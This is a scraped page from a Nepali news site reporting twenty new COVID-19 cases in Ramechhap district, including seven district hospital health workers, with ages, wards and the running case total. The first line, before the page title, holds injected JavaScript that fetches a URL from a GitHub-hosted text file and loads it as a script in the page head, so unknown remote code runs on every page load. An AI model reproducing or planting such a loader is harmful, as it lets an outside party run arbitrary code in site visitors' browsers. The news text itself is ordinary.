;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); जिल्ला अस्पतालका ७ जना स्वास्थ्यकर्मीसहित आज रामेछापमा २० जनामा कोरोना पुष्टि : संक्रमिको संख्या २ सय नाघ्यो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • जिल्ला अस्पतालका ७ जना स्वास्थ्यकर्मीसहित आज रामेछापमा २० जनामा कोरोना पुष्टि : संक्रमिको संख्या २ सय नाघ्यो
समाचार

जिल्ला अस्पतालका ७ जना स्वास्थ्यकर्मीसहित आज रामेछापमा २० जनामा कोरोना पुष्टि : संक्रमिको संख्या २ सय नाघ्यो

असोज २२

रामेछाप । रामेछाप जिल्लामा बिहिबार २० जनामा कोरोना पुष्टि भएको छ । जिल्लामा एकैदिन यतिधेरै संक्रमित देखिएको आज पहिलो दिन हो । यो संगै रामेछाप जिल्लाबाट संकलन गरी पठाएको रिपोर्ट पोजेटिभ हुनेको संख्या १ सय १ पुगेको छ ।

आज पोजेटिभ हुनेको संक्रमितहरुमा मन्थली नगरपालिकाका ७ जना रहेका छन् । जसमा ४०, ३२, १९ २१,६५,४७ र २६ वर्षका पुरुष रहेका छन् । उनीरहरु मन्थली नगरपालिका वडा नं  १ का ५ जना रहेका छन । भने २ नं का २ जना रहेका छन् । उनीहरु मन्थलीको प्राथमिक स्वास्थ्य  चौकीमा एक पुरुष बाहिरबाट रेफर भैइ आएको बताइएको छ ।

त्यस्तै जिल्ला अस्पताल रामेछाका ७ जना स्वास्थ्यकर्मी रहेका छन् । जसमा २७, ५०, २५, र ४२ वर्षका परुषहरु रहेका छन् ।  उनीहरु मध्येमा एक जना होम आइसोलेसनमा र ५ जना जिल्ला अस्पतालमा राखिएको छ ।

त्यस्तै रामेछाप नगरपालिकाका ३ जना रहेका छन् । जसमा ५६।२२, ७४ वर्षीय महिला छन् । एक जना वडा नं ६ की महिला हुन् ।  जिल्ला अस्पतालमा रहेका एक संक्रमित पनि बाहिरबाट आएका हुन् ।

त्यस्तै जिल्ला बाहिर रहेका रामेछाप घर भएकाहरुमा बिहिबार सम्ममा १०५ मा पोजेटिभ आएको छ । योसंगै जिल्लामा संक्रमितको संख्या २ सय ६ पुगेको छ ।

जिल्लाम संक्रमितको संख्या बढेसंगै जिल्लामा त्रास बढेको छ ।

No description available.

फेसबुक प्रतिक्रियाहरु